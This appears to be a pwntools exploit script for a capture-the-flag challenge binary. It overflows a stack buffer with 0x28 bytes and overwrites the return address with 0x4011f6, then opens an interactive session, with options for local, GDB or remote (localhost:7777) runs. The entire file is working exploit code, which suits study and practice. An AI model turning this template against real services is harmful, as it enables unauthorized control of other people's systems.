#!/usr/bin/python3
from pwn import *

filename = "./pwn"
libcname = "/lib/x86_64-linux-gnu/libc.so.6"
host = 'localhost'
port = 7777
elf = context.binary = ELF(filename)
context.terminal = ['tmux', 'neww']
if libcname:
    libc = ELF(libcname)
gs = '''
b main
'''

def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript = gs)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process(elf.path)

p = start()

p.sendline(b'a'*0x28 + p64(0x4011f6))

p.interactive()